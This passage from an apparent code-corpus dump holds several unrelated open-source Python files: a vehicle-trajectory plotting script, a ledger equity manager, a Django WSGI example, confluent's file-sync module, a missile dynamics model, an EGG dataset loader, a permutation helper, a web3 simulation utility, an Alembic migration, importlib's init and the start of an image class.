            current_data_matrix[j, 14] = car2[j, 3]
            if car1[-1, 1] > car2[-1, 1]:
                current_data_matrix[j, 15] = 1
            else:
                current_data_matrix[j, 15] = 0
        current_data_matrix = current_data_matrix[1:, :]
        data_matrix = np.concatenate((data_matrix, current_data_matrix), axis=0)
    np.savetxt('./data_matrix.txt', data_matrix[1:, :], '%.4f')


##################################################################

def divide_data(data_matrix, segment_length):
    """
    This function serves to separate the two situation cases.
    """
    situation0_data = data_matrix[np.where(data_matrix[:, -1] == 0)]
    situation1_data = data_matrix[np.where(data_matrix[:, -1] == 1)]
    np.savetxt('./all_trajs_1.txt', situation0_data, '%.4f')
    np.savetxt('./all_trajs_2.txt', situation1_data, '%.4f')

    # count seq lengths
    # separate sequence segments
    # all_trajs_seg_1 = np.zeros((1, data_matrix.shape[1]))
    # all_trajs_seg_2 = np.zeros((1, data_matrix.shape[1]))
    all_trajs_1 = np.zeros((1, data_matrix.shape[1]))
    all_trajs_2 = np.zeros((1, data_matrix.shape[1]))
    count0, count1 = [], []

    # for i in range(128):
    #     print('i = '+str(i))
    #     temp_data = data_matrix[np.where(data_matrix[:,0] == i)]
    #     if temp_data[0,-1] == 0:
    #         for j in range(temp_data.shape[0]-segment_length+1):
    #             temp_seg_data = temp_data[j:j+segment_length, :]
    #             count0.append(temp_seg_data.shape[0])
    #             all_trajs_seg_1 = np.concatenate((all_trajs_seg_1, temp_seg_data),axis=0)
    #     else:
    #         for j in range(temp_data.shape[0]-segment_length+1):
    #             temp_seg_data = temp_data[j:j+segment_length, :]
    #             count1.append(temp_seg_data.shape[0])
    #             all_trajs_seg_2 = np.concatenate((all_trajs_seg_2, temp_seg_data),axis=0)

    for i in range(128):
        print('i = ' + str(i))
        temp_data = data_matrix[np.where(data_matrix[:, 0] == i)]
        if temp_data[0, -1] == 0:
            count0.append(temp_data.shape[0])
            all_trajs_1 = np.concatenate((all_trajs_1, temp_data), axis=0)
        elif temp_data[0, -1] == 1:
            count1.append(temp_data.shape[0])
            all_trajs_2 = np.concatenate((all_trajs_2, temp_data), axis=0)

    print(all_trajs_1.shape)
    print(all_trajs_2.shape)
    print(sum(count0))
    print(sum(count1))
    # np.savetxt('./all_trajs_seg_1.txt', all_trajs_seg_1[1:,:], '%.4f')
    # np.savetxt('./all_trajs_seg_2.txt', all_trajs_seg_2[1:,:], '%.4f')
    np.savetxt('./all_trajs_seq_length_1.txt', np.array(count0), '%d')
    np.savetxt('./all_trajs_seq_length_2.txt', np.array(count1), '%d')


# data_process()
# data_matrix = np.loadtxt('./data_matrix.txt')
# divide_data(data_matrix=data_matrix, segment_length=30)

###############################################

def check_data():
    data = np.loadtxt('../simulation_data/data_matrix.txt')
    temp_data = data[np.where(data[:, 0] == 69)]
    T = temp_data.shape[0]
    car1_long_vel = temp_data[:, 3]
    car2_long_vel = temp_data[:, 7]
    car1_acc = 10 * (temp_data[1:, 3] - temp_data[:-1, 3])
    car2_acc = 10 * (temp_data[1:, 7] - temp_data[:-1, 7])

    # plt.figure(1)
    # plt.plot(range(T-1), car1_acc, c='b', label='main lane car acceleration')
    # plt.plot(range(T-1), car2_acc, c='r', label='merging car acceleration')
    # plt.legend()

    plt.figure(2, figsize=(14, 4))
    plt.plot(range(T), car1_long_vel, c='b', label='main lane car velocity')
    plt.plot(range(T), car2_long_vel, c='r', label='merging car velocity')
    plt.legend()
    plt.savefig('./long_vel_69.eps', bbox_inches='tight')
    # plt.show()


# check_data()

###############################################

def plot_vehicles(case_id, data_matrix):
    """
    This function is to plot vehicle trajectories with bounding boxes.
    """
    current_case_data = data_matrix[np.where(data_matrix[:, 0] == case_id)]
    T = current_case_data.shape[0]
    fig = plt.figure(figsize=(20, 2))
    for i in range(T):
        if i < 10:
            name = '00' + str(i)
        elif i >= 10 and i < 100:
            name = '0' + str(i)
        elif i >= 100:
            name = str(i)
        ax = fig.add_subplot(111, aspect='equal')
        ax.add_patch(
            patches.Rectangle(
                (current_case_data[i, 2] - 2.0, current_case_data[i, 4] - 0.9),  # (x, y)
                4.0,   # width
                1.8,   # height
                alpha=0.3 + 0.7 * (T - i) / float(T),
                facecolor='blue',
                edgecolor='black',
                linewidth=0.5
            )
        )
        ax.add_patch(
            patches.Rectangle(
                (current_case_data[i, 6] - 2.0, current_case_data[i, 8] - 0.9),  # (x, y)
                4.0,   # width
                1.8,   # height
                alpha=0.3 + 0.7 * (T - i) / float(T),
                facecolor='red',
                edgecolor='black',
                linewidth=0.5
            )
        )
        ax.plot(range(-805, -360), -605 * np.ones(445), color='k', linewidth=1)
        ax.plot(range(-805, -584), -610 * np.ones(221), color='k', linewidth=1)
        ax.plot(range(-445, -360), -610 * np.ones(85), color='k', linewidth=1)
        x = [[-584, -805], [-445, -805]]
        y = [[-610, -618], [-610, -622]]
        for l in range(len(x)):
            ax.plot(x[l], y[l], color='k', linewidth=1)
        ax.set_xlim(-680, -400)
        ax.set_ylim(-620, -600)
        ax.set_xticks([])
        ax.set_yticks([])
        fig.savefig('./vehicles_plot/' + str(case_id) + '_' + str(name) + '.png',
                    bbox_inches='tight')


data_matrix = np.loadtxt('./data_matrix.txt')
plot_vehicles(case_id=8, data_matrix=data_matrix)
3.109375
3
balancesheet/equityManager.py
tylertjburns/ledgerkeeper
0
1841
import balancesheet.mongoData.equities_data_service as dsvce
from userInteraction.financeCliInteraction import FinanceCliInteraction
import ledgerkeeper.mongoData.account_data_service as dsvca
from balancesheet.enums import EquityClass, AssetType, LiabiltyType, \
    EquityTimeHorizon, EquityStatus, EquityContingency
import plotter as plot


class EquityManager():
    def __init__(self, user_notification_system: FinanceCliInteraction):
        self.uns = user_notification_system

    def add_equity(self):
        name = self.uns.request_string("Name: ")
        description = self.uns.request_string("Description: ")
        accountName = self.uns.request_from_dict(dsvca.accounts_as_dict())
        equityClass = self.uns.request_enum(EquityClass)

        if equityClass == EquityClass.ASSET:
            equityType = self.uns.request_enum(AssetType)
        elif equityClass == EquityClass.LIABILITY:
            equityType = self.uns.request_enum(LiabiltyType)
        else:
            raise Exception(f"Unknown equity class: {equityClass.name}")

        interestRate = self.uns.request_float("Interest Rate: ")
        equityTimeHorizon = self.uns.request_enum(EquityTimeHorizon)
        equityStatus = self.uns.request_enum(EquityStatus)
        equityContingency = self.uns.request_enum(EquityContingency)

        equity = dsvce.enter_if_not_exists(name=name,
                                           description=description,
                                           accountId=str(dsvca.account_by_name(accountName).id),
                                           equityClass=equityClass,
                                           equityType=equityType,
                                           equityTimeHorizon=equityTimeHorizon,
                                           equityStatus=equityStatus,
                                           equityContingency=equityContingency,
                                           interestRate=interestRate)

        if equity is not None:
            self.uns.notify_user("Equity entered successfully!")

    def delete_equity(self):
        accountName = self.uns.request_from_dict(dsvca.accounts_as_dict())
        equityName = self.uns.request_from_dict(dsvce.equities_as_dict())
        dsvce.delete_equity(dsvca.account_by_name(accountName).id, equityName)

    def record_value(self):
        accountName = self.uns.request_from_dict(dsvca.accounts_as_dict())
        equityName = self.uns.request_from_dict(dsvce.equities_as_dict())
        year = self.uns.request_int("Year: ")
        month = self.uns.request_int("Month: ")
        value = self.uns.request_float("Value: ")

        account = dsvca.account_by_name(accountName)
        equity = dsvce.equity_by_account_and_name(str(account.id), equityName)
        if equity is None:
            raise Exception(f"Equity: {accountName} [{account.id}], {equityName} not found.")

        value = dsvce.record_value_on_equity(equity, year, month, value)
        if value is not None:
            self.uns.notify_user("Value Recorded successfully!")

    def print_value_snapshots(self, accountName=None):
        if accountName is None:
            accountName = self.uns.request_from_dict(dsvca.accounts_as_dict())
        account = dsvca.account_by_name(accountName)
        equities = dsvce.equities_by_account(account.id)
        if equities is None or len(equities) == 0:
            self.uns.notify_user(f"No Equities in account [{accountName}]")
            return
        self.uns.pretty_print_items(sorted(equities, key=lambda x: x.equityType),
                                    title="Equities Snapshots")

    def print_equities(self):
        self.uns.pretty_print_items(dsvce.query_equities("").to_json(),
                                    title="Equities")

    def print_balance_sheet(self):
        accountName = self.uns.request_from_dict(dsvca.accounts_as_dict())
        relevant_mos = self.uns.request_int("Number of past months: ")
        account = dsvca.account_by_name(accountName)
        data = dsvce.balance_sheet_over_time(relevant_months=relevant_mos,
                                             accountIds=[str(account.id)])
        self.uns.notify_user(f"\n---------Balance Sheet---------")
        self.uns.pretty_print_items(data)

    def plot_balance_over_time(self):
        relevant_mos = self.uns.request_int("Number of past months: ")
        accountName = self.uns.request_from_dict(dsvca.accounts_as_dict())
        account = dsvca.account_by_name(accountName)
        ax = plot.plot_assets_liabilities_worth_over_time(relevant_mos,
                                                          accountIds=[str(account.id)])
        if ax is None:
            self.uns.notify_user("No Data to show...")
2.390625
2
examples/django/hello_world/wsgi.py
liuyu81/SnapSearch-Client-Python
0
1842
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "hello_world.settings")

# django WSGI application
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()

# load SnapSearch API credentials
api_email = "<email>"
api_key = "<key>"

# initialize the interceptor
from SnapSearch import Client, Detector, Interceptor
interceptor = Interceptor(Client(api_email, api_key), Detector())

# deploy the interceptor
from SnapSearch.wsgi import InterceptorMiddleware
application = InterceptorMiddleware(application, interceptor)
1.625
2
confluent_server/confluent/syncfiles.py
xcat2/confluent
27
1843
# vim: tabstop=4 shiftwidth=4 softtabstop=4

# Copyright 2021 Lenovo
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import glob
import os
import shutil
import tempfile
import confluent.sshutil as sshutil
import confluent.util as util
import confluent.noderange as noderange
import eventlet
import pwd
import grp


def mkdirp(path):
    try:
        os.makedirs(path)
    except OSError as e:
        if e.errno != 17:
            raise


def get_entries(filename):
    secname = 'REPLACE:'
    filename = filename.strip()
    if filename[-1] == '>':
        filename = filename[:-1]
    with open(filename, 'r') as slfile:
        slist = slfile.read()
    entries = slist.split('\n')
    for ent in entries:
        ent = ent.split('#', 1)[0].strip()
        if not ent:
            continue
        if ent in ('APPENDONCE:', 'MERGE:', 'REPLACE:'):
            secname = ent
        if ent[0] == '<':
            subfilename = ent[1:]
            if subfilename[-1] == '>':
                subfilename = subfilename[:-1]
            if subfilename[0] != '/':
                subfilename = os.path.join(os.path.dirname(filename), subfilename)
            for subent in get_entries(subfilename):
                yield subent
            yield secname
        else:
            yield ent


class SyncList(object):
    def __init__(self, filename, nodename, cfg):
        slist = None
        self.replacemap = {}
        self.appendmap = {}
        self.appendoncemap = {}
        self.mergemap = {}
        self.optmap = {}
        entries = get_entries(filename)
        currmap = self.replacemap
        for ent in entries:
            try:
                cmtidx = ent.index('#')
                ent = ent[:cmtidx]
            except ValueError:
                pass
            for special in '$%^&|{}':
                if special in ent:
                    raise Exception(
                        'Special character "{}" reserved for future use'.format(special))
            ent = ent.strip()
            if not ent:
                continue
            if ent[-1] == ':':
                if ent == 'MERGE:':
                    currmap = self.mergemap
                elif ent == 'APPENDONCE:':
                    currmap = self.appendoncemap
                elif ent == 'REPLACE:':
                    currmap = self.replacemap
                else:
                    raise Exception(
                        'Section "{}" is not currently supported in syncfiles'.format(ent[:-1]))
                continue
            if '->' in ent:
                k, v = ent.split('->')
                k = k.strip()
                v = v.strip()
                if ':' in v:
                    nr, v = v.split(':', 1)
                    for candidate in noderange.NodeRange(nr, cfg).nodes:
                        if candidate == nodename:
                            break
                    else:
                        continue
                optparts = v.split()
                v = optparts[0]
                optparts = optparts[1:]
            else:
                kparts = []
                optparts = []
                currparts = kparts
                for part in ent.split():
                    if part[0] == '(':
                        currparts = optparts
                    currparts.append(part)
                k = ' '.join(kparts)
                v = None
            entopts = {}
            if optparts:
                if optparts[0][0] != '(' or optparts[-1][-1] != ')':
                    raise Exception("Unsupported syntax in syncfile: " + ent)
                opts = ','.join(optparts)
                opts = opts[1:-1]
                for opt in opts.split(','):
                    optname, optval = opt.split('=')
                    if optname == 'owner':
                        try:
                            uid = pwd.getpwnam(optval).pw_uid
                        except KeyError:
                            uid = None
                        optval = {'name': optval, 'id': uid}
                    elif optname == 'group':
                        try:
                            gid = grp.getgrnam(optval).gr_gid
                        except KeyError:
                            gid = None
                        optval = {'name': optval, 'id': gid}
                    entopts[optname] = optval
            currmap[k] = v
            targ = v if v else k
            for f in targ.split():
                self.optmap[f] = entopts


def sync_list_to_node(sl, node, suffixes):
    targdir = tempfile.mkdtemp('.syncto{}'.format(node))
    output = ''
    try:
        for ent in sl.replacemap:
            stage_ent(sl.replacemap, ent, targdir)
        if 'append' in suffixes:
            while suffixes['append'] and suffixes['append'][0] == '/':
                suffixes['append'] = suffixes['append'][1:]
            for ent in sl.appendmap:
                stage_ent(sl.appendmap, ent,
                          os.path.join(targdir, suffixes['append']))
        if 'merge' in suffixes:
            while suffixes['merge'] and suffixes['merge'][0] == '/':
                suffixes['merge'] = suffixes['merge'][1:]
            for ent in sl.mergemap:
                stage_ent(sl.mergemap, ent,
                          os.path.join(targdir, suffixes['merge']), True)
        if 'appendonce' in suffixes:
            while suffixes['appendonce'] and suffixes['appendonce'][0] == '/':
                suffixes['appendonce'] = suffixes['appendonce'][1:]
            for ent in sl.appendoncemap:
                stage_ent(sl.appendoncemap, ent,
                          os.path.join(targdir, suffixes['appendonce']), True)
        sshutil.prep_ssh_key('/etc/confluent/ssh/automation')
        output = util.run(
            ['rsync', '-rvLD', targdir + '/', 'root@{}:/'.format(node)])[0]
    except Exception as e:
        if 'CalledProcessError' not in repr(e):
            # https://github.com/eventlet/eventlet/issues/413
            # for some reason, can't catch the calledprocesserror normally
            # for this exception, implement a hack workaround
            raise
        unreadablefiles = []
        for root, dirnames, filenames in os.walk(targdir):
            for filename in filenames:
                filename = os.path.join(root, filename)
                try:
                    with open(filename, 'r') as _:
                        pass
                except OSError as e:
                    unreadablefiles.append(filename.replace(targdir, ''))
        if unreadablefiles:
            raise Exception("Syncing failed due to unreadable files: " +
                            ','.join(unreadablefiles))
        else:
            raise
    finally:
        shutil.rmtree(targdir)
    if not isinstance(output, str):
        output = output.decode('utf8')
    retval = {
        'options': sl.optmap,
        'output': output,
    }
    return retval  # need dictionary with output and options


def stage_ent(currmap, ent, targdir, appendexist=False):
    dst = currmap[ent]
    everyfent = []
    allfents = ent.split()
    for tmpent in allfents:
        fents = glob.glob(tmpent)
        everyfent.extend(fents)
    if not everyfent:
        raise Exception('No matching files for "{}"'.format(ent))
    if dst is None:  # this is to indicate source and destination as one
        dst = os.path.dirname(everyfent[0]) + '/'
    while dst and dst[0] == '/':
        dst = dst[1:]
    if len(everyfent) > 1 and dst[-1] != '/':
        raise Exception(
            'Multiple files match {}, {} needs a trailing slash to indicate a directory'.format(ent, dst))
    fulltarg = os.path.join(targdir, dst)
    for targ in everyfent:
        mkpathorlink(targ, fulltarg, appendexist)


def mkpathorlink(source, destination, appendexist=False):
    if os.path.isdir(source):
        mkdirp(destination)
        for ent in os.listdir(source):
            currsrc = os.path.join(source, ent)
            currdst = os.path.join(destination, ent)
            mkpathorlink(currsrc, currdst)
    else:
        if destination[-1] == '/':
            mkdirp(destination)
            destination = os.path.join(destination, os.path.basename(source))
        else:
            mkdirp(os.path.dirname(destination))
        if appendexist and os.path.exists(destination):
            tmpnam = tempfile.mktemp()
            shutil.copy(destination, tmpnam)
            os.remove(destination)
            with open(destination, 'w') as realdest:
                with open(tmpnam) as olddest:
                    realdest.write(olddest.read())
                with open(source) as sourcedata:
                    realdest.write(sourcedata.read())
            os.remove(tmpnam)
        else:
            os.symlink(source, destination)


syncrunners = {}


def start_syncfiles(nodename, cfg, suffixes):
    deployinfo = cfg.get_node_attributes(
        nodename, ('deployment.*',))
    deployinfo = deployinfo.get(nodename, {})
    profile = deployinfo.get(
        'deployment.pendingprofile', {}).get('value', '')
    if not profile:
        profile = deployinfo.get(
            'deployment.stagedprofile', {}).get('value', '')
    if not profile:
        profile = deployinfo.get(
            'deployment.profile', {}).get('value', '')
    if not profile:
        raise Exception('Cannot perform syncfiles without profile assigned')
    synclist = '/var/lib/confluent/public/os/{}/syncfiles'.format(profile)
    if not os.path.exists(synclist):
        return '200 OK'  # not running
    sl = SyncList(synclist, nodename, cfg)
    if not (sl.appendmap or sl.mergemap or sl.replacemap or sl.appendoncemap):
        return '200 OK'  # the synclist has no actual entries
    syncrunners[nodename] = eventlet.spawn(
        sync_list_to_node, sl, nodename, suffixes)
    return '202 Queued'  # backgrounded


def get_syncresult(nodename):
    if nodename not in syncrunners:
        return ('204 Not Running', '')
    if not syncrunners[nodename].dead:
        return ('200 OK', '')
    result = syncrunners[nodename].wait()
    del syncrunners[nodename]
    return ('200 OK', result)
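A hedged example of the synclist syntax this module parses (all paths, the noderange, and the include file below are illustrative):

# entries before any section header fall under REPLACE:
/etc/hosts -> /etc/hosts
# only applied to nodes in the noderange prefix; options set ownership
/etc/motd -> compute[1-10]:/etc/motd (owner=root,group=root)
MERGE:
/etc/passwd
APPENDONCE:
/etc/ssh/sshd_banner
<common.synclist>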
2.125
2
fym/models/missile.py
JungYT/fym
14
1844
import numpy as np

from fym.core import BaseSystem


class MissilePlanar(BaseSystem):
    R = 288
    g = 9.80665
    S = 1
    t1 = 1.5
    t2 = 8.5
    name = 'missile'

    def __init__(self, initial_state):
        super().__init__(initial_state)

    def external(self, states, controls):
        return 0
        # return {"wind": [(0, 0), (0, 0)]}  # no external effects

    def deriv(self, state, t, control, external):
        # state and (control) input
        x, y, V, gamma = state.ravel()
        a = control
        # temperature
        if y <= 11000:
            Tmp = 288.16 - 0.0065 * y
        else:
            Tmp = 216.66
        # Mach number
        M = V / (1.4 * self.R * Tmp)**0.5
        # Mass and thrust (Note: guidance loop is closed after t=t1)
        if t < self.t1:
            m = 135 - 14.53 * t
            T = 33000
        elif t < self.t2:
            m = 113.205 - 3.331 * t
            T = 7500
        else:
            m = 90.035
            T = 0
        # density and dynamic pressure
        rho = (1.15579 - 1.058 * 1e-4 * y + 3.725 * 1e-9 * y**2
               - 6.0 * 1e-14 * y**3)  # y in [0, 20000]
        Q = 0.5 * rho * V**2
        # Drag model
        if M < 0.93:
            Cd0 = 0.02
        elif M < 1.03:
            Cd0 = 0.02 + 0.2 * (M - 0.93)
        elif M < 1.10:
            Cd0 = 0.04 + 0.06 * (M - 1.03)
        else:
            Cd0 = 0.0442 - 0.007 * (M - 1.10)
        if M < 1.15:
            K = 0.2
        else:
            K = 0.2 + 0.246 * (M - 1.15)
        D0 = Cd0 * Q * self.S
        Di = K * m**2 * a**2 / (Q * self.S)
        D = D0 + Di

        dxdt = V * np.cos(gamma)
        dydt = V * np.sin(gamma)
        dVdt = (T - D) / m - self.g * np.sin(gamma)
        dgammadt = (a - self.g * np.cos(gamma)) / V

        return np.vstack([dxdt, dydt, dVdt, dgammadt])
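A rough standalone sketch of stepping deriv() with forward Euler (the initial state, the constant 3 g lateral-acceleration command, and the step size are all made up; inside fym the environment machinery would normally drive the integration):

import numpy as np

state = np.vstack([0.0, 5000.0, 250.0, 0.0])   # x [m], y [m], V [m/s], gamma [rad]
missile = MissilePlanar(state)
dt = 0.01
for k in range(1000):                          # simulate 10 s
    t = k * dt
    a = 3 * MissilePlanar.g                    # lateral acceleration command
    state = state + dt * missile.deriv(state, t, a, None)
print(state.ravel())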
2.859375
3
egg/zoo/addition/data.py
chengemily/EGG
1
1845
# Copyright (c) Facebook, Inc. and its affiliates.

# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.

from typing import Iterable, Optional, Tuple

import torch
from torch.utils.data import DataLoader


class ScaledDataset:
    def __init__(self, examples, scaling_factor=1):
        self.examples = examples
        self.scaling_factor = scaling_factor

    def __len__(self):
        return len(self.examples) * self.scaling_factor

    def __getitem__(self, k):
        k = k % len(self.examples)
        return self.examples[k]


def get_dataloaders(opts) -> Tuple[
    Iterable[Tuple[torch.Tensor, torch.Tensor, Optional[torch.Tensor]]],
    Iterable[Tuple[torch.Tensor, torch.Tensor, Optional[torch.Tensor]]],
    Iterable[Tuple[torch.Tensor, torch.Tensor, Optional[torch.Tensor]]],
]:
    "Returning an iterator for tuple(sender_input, labels, receiver_input)."
    full_data = enumerate_dataset(opts.input_size)

    len_train = int(opts.training_density * len(full_data))
    train_set, holdout_set = torch.utils.data.random_split(
        full_data, [len_train, len(full_data) - len_train]
    )
    validation_set = train_set
    train_set = ScaledDataset(train_set, opts.data_scaler)

    train_loader = DataLoader(train_set, batch_size=opts.batch_size, shuffle=True)
    validation_loader = DataLoader(validation_set, batch_size=len(validation_set))
    holdout_loader = DataLoader(holdout_set, batch_size=opts.batch_size)

    return train_loader, validation_loader, holdout_loader


def enumerate_dataset(input_size):
    data = []
    labels = []

    for i in range(input_size):
        for j in range(input_size):
            inp = torch.zeros(2 * input_size)
            inp[i] = 1.0
            inp[input_size + j] = 1.0

            label = torch.zeros(2 * input_size - 1)
            label[i + j] = 1.0

            data.append(inp)
            labels.append(label)

    data_tuples = [(data[i], labels[i]) for i in range(len(data))]
    return data_tuples
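A quick check of the encoding (pure function, no EGG machinery involved): with input_size=2, each sample concatenates two one-hot addends and the label one-hot encodes their sum:

pairs = enumerate_dataset(2)
inp, label = pairs[3]          # the (i=1, j=1) sample
print(inp.tolist())            # [0.0, 1.0, 0.0, 1.0]
print(label.tolist())          # [0.0, 0.0, 1.0]  -> 1 + 1 = 2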
2.21875
2
mathfun/lexographic.py
lsbardel/mathfun
0
1846
""" Next lexicographical permutation algorithm https://www.nayuki.io/page/next-lexicographical-permutation-algorithm """ def next_lexo(S): b = S[-1] for i, a in enumerate(reversed(S[:-1]), 2): if a < b: # we have the pivot a for j, b in enumerate(reversed(S), 1): if b > a: F = list(S) F[-i], F[-j] = F[-j], F[-i] F = F[: -i + 1] + sorted(F[-i + 1 :]) return "".join(F) else: b = a return "no answer"
3.671875
4
simulation-web3py/utility.py
miker83z/cloud-chain
0
1847
import json
import os
from argparse import ArgumentTypeError

from eth_typing import Address
from web3.contract import Contract

from settings import MIN_VAL, MAX_VAL, DEPLOYED_CONTRACTS, CONFIG_DIR


async def init_simulation(contracts: [], factor: float, fn: str, status_init: bool) -> bool:
    statuses = [True]
    try:
        if status_init:
            for c in contracts:
                # Use different cloud_addresses for each contract instance
                cloud_address, cloud_status_ok = await c.cloud_sla_creation_activation()
                c.set_cloud_sla_address(cloud_address)
                statuses.append(cloud_status_ok)
                if fn == 'read' or fn == 'read_deny_lost_file_check' or fn == 'file_check_undeleted_file':
                    statuses.append(await c.upload())
                if fn == 'file_check_undeleted_file':
                    statuses.append(await c.read())
                if fn == 'corrupted_file_check':
                    statuses.append(await c.another_file_upload_read())
                if fn == 'delete':
                    for _ in range(round(factor / DEPLOYED_CONTRACTS) + 1):
                        statuses.append(await c.upload())
        else:
            for c in contracts:
                if fn == 'delete':
                    if c.tx_upload_count < round(factor / DEPLOYED_CONTRACTS) + 1:
                        for _ in range(abs(c.tx_upload_count - (round(factor / DEPLOYED_CONTRACTS) + 1))):
                            statuses.append(await c.upload())
    except ValueError as v:
        print(f'{type(v)} [init_sim]: {v}')
    else:
        return check_statuses(statuses)


def get_credentials(blockchain: str) -> tuple:
    if blockchain == 'polygon':
        from settings import (
            polygon_private_keys
        )
        return polygon_private_keys
    from settings import (
        quorum_private_keys
    )
    return quorum_private_keys


def get_contract(w3, address: Address, compiled_contract_path: str) -> Contract:
    def get_abi(path: str) -> list:
        with open(path) as file:
            contract_json = json.load(file)
            contract_abi = contract_json['abi']
        return contract_abi

    abi = get_abi(compiled_contract_path)
    contract = w3.eth.contract(address=address, abi=abi)
    return contract


def check_statuses(statuses: []) -> bool:
    for idx in range(len(statuses)):
        if statuses[idx] == 0:
            return False
    return True


def exists_mkdir(paths: []):
    for path in paths:
        if not os.path.exists(path):
            os.mkdir(path)


def get_contracts_config(blockchain: str, msg: bool = True):
    if msg:
        print('Retrieve config file...')
    filename = f'{blockchain}.json'
    filepath = os.path.join(os.getcwd(), CONFIG_DIR, filename)
    with open(filepath) as file:
        contracts_summary = json.loads(file.read())
    if msg:
        print(f'Config file retrieved at {filepath}.')
    return contracts_summary


def range_limited_val(arg: str) -> int:
    """
    Type function for argparse - int within some predefined bounds.
    """
    try:
        s = int(arg)
    except ValueError:
        raise ArgumentTypeError("must be an int number")
    if s < MIN_VAL or s > MAX_VAL:
        raise ArgumentTypeError(f"argument must be > {str(MIN_VAL)} and < {str(MAX_VAL)}")
    return s
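A hedged sketch of the argparse helper in use (the flag name is illustrative; MIN_VAL and MAX_VAL come from settings):

from argparse import ArgumentParser

parser = ArgumentParser()
parser.add_argument('-t', '--txs', type=range_limited_val,
                    help=f'integer between {MIN_VAL} and {MAX_VAL}')
args = parser.parse_args(['-t', '42'])   # argparse rejects out-of-range values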
2.125
2
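range_limited_val is an argparse "type" callable; a minimal sketch of wiring it into a parser, assuming MIN_VAL/MAX_VAL allow 100 (the flag name is illustrative):

import argparse

parser = argparse.ArgumentParser()
parser.add_argument("-t", "--txs", type=range_limited_val,
                    help="number of transactions to simulate")

args = parser.parse_args(["-t", "100"])
assert args.txs == 100
# non-int or out-of-range values raise ArgumentTypeError, which argparse
# turns into a usage error for the user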
migrations/versions/816ea3631582_add_topics.py
OpenASL/HowSignBot
9
1848
"""add topics Revision ID: 816ea3631582 Revises: <KEY> Create Date: 2021-03-13 14:20:10.044131 """ from alembic import op import sqlalchemy as sa import bot # revision identifiers, used by Alembic. revision = "816ea3631582" down_revision = "<KEY>" branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.create_table( "topics", sa.Column("content", sa.Text(), nullable=False), sa.Column("last_synced_at", bot.database.TIMESTAMP(timezone=True), nullable=True), sa.PrimaryKeyConstraint("content"), ) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.drop_table("topics") # ### end Alembic commands ###
1.515625
2
src/Lib/importlib/__init__.py
NUS-ALSET/ace-react-redux-brython
1
1849
"""A pure Python implementation of import.""" __all__ = ['__import__', 'import_module', 'invalidate_caches'] # Bootstrap help ##################################################### # Until bootstrapping is complete, DO NOT import any modules that attempt # to import importlib._bootstrap (directly or indirectly). Since this # partially initialised package would be present in sys.modules, those # modules would get an uninitialised copy of the source version, instead # of a fully initialised version (either the frozen one or the one # initialised below if the frozen one is not available). import _imp # Just the builtin component, NOT the full Python module import sys from . import machinery from . import _bootstrap _bootstrap._setup(sys, _imp) # To simplify imports in test code _w_long = _bootstrap._w_long _r_long = _bootstrap._r_long # Fully bootstrapped at this point, import whatever you like, circular # dependencies and startup overhead minimisation permitting :) # Public API ######################################################### from ._bootstrap import __import__ def invalidate_caches(): """Call the invalidate_caches() method on all meta path finders stored in sys.meta_path (where implemented).""" for finder in sys.meta_path: if hasattr(finder, 'invalidate_caches'): finder.invalidate_caches() def find_loader(name, path=None): """Find the loader for the specified module. First, sys.modules is checked to see if the module was already imported. If so, then sys.modules[name].__loader__ is returned. If that happens to be set to None, then ValueError is raised. If the module is not in sys.modules, then sys.meta_path is searched for a suitable loader with the value of 'path' given to the finders. None is returned if no loader could be found. Dotted names do not have their parent packages implicitly imported. You will most likely need to explicitly import all parent packages in the proper order for a submodule to get the correct loader. """ try: loader = sys.modules[name].__loader__ if loader is None: raise ValueError('{}.__loader__ is None'.format(name)) else: return loader except KeyError: pass return _bootstrap._find_module(name, path) def import_module(name, package=None): """Import a module. The 'package' argument is required when performing a relative import. It specifies the package to use as the anchor point from which to resolve the relative import to an absolute import. """ level = 0 if name.startswith('.'): if not package: raise TypeError("relative imports require the 'package' argument") for character in name: if character != '.': break level += 1 return _bootstrap._gcd_import(name[level:], package, level) #need at least one import hook for importlib stuff to work. from . import basehook sys.meta_path.append(basehook.BaseHook())
2.484375
2
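The 'package' argument to import_module anchors relative imports, the same contract as the standard library's importlib; a short sketch using the stdlib module:

import importlib

json_mod = importlib.import_module("json")                      # absolute
decoder = importlib.import_module(".decoder", package="json")   # relative
assert decoder.__name__ == "json.decoder"
assert json_mod.loads("[1, 2]") == [1, 2]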
lib/arlunio/arlunio/image.py
swyddfa/stylo
0
1850
<gh_stars>0 from __future__ import annotations import base64 import io import logging import pathlib from typing import Optional # TODO: Remove these, as they should be contained in the numpy backend. import numpy as np import PIL.Image as PImage import arlunio.ast as ast import arlunio.color as color import arlunio.mask as mask import arlunio.math as math logger = logging.getLogger(__name__) class Image: """Our representation of an image, implemented as a wrapper around a standard Pillow image.""" def __init__(self, img: PImage.Image): self.img = img """The wrapped pillow image object.""" def __eq__(self, other): if not isinstance(other, Image): return False a = np.asarray(self.img) b = np.asarray(other.img) return (a == b).all() def __add__(self, other): if isinstance(other, Image): other = other.img if not isinstance(other, PImage.Image): raise TypeError("Addition is only supported between images.") img = self.copy() img.alpha_composite(other) return img @property def __array_interface__(self): # Ensure that our version of an image also plays nice with numpy. return self.img.__array_interface__ def _repr_png_(self): # Give nice previews in jupyter notebooks return self.img._repr_png_() @property def size(self): return self.img.size def alpha_composite(self, im, *args, **kwargs): """Composites an image onto this image. See :meth:`pillow:PIL.Image.Image.alpha_composite` """ if isinstance(im, Image): im = im.img self.img.alpha_composite(im, *args, **kwargs) def copy(self): """Return a copy of the image. See :meth:`pillow:PIL.Image.Image.copy` """ return Image(self.img.copy()) def paste(self, *args, **kwargs): """Paste another image into this image. See :meth:`pillow:PIL.Image.Image.paste` """ self.img.paste(*args, **kwargs) def save(self, *args, **kwargs): """Save the image with the given filename. See :meth:`pillow:PIL.Image.Image.save` """ self.img.save(*args, **kwargs) def thumbnail(self, *args, **kwargs): """Convert this image into a thumbail. See 